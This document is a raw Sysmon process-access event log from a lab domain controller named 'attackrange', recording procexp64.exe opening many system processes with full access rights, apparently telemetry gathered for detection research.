15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program 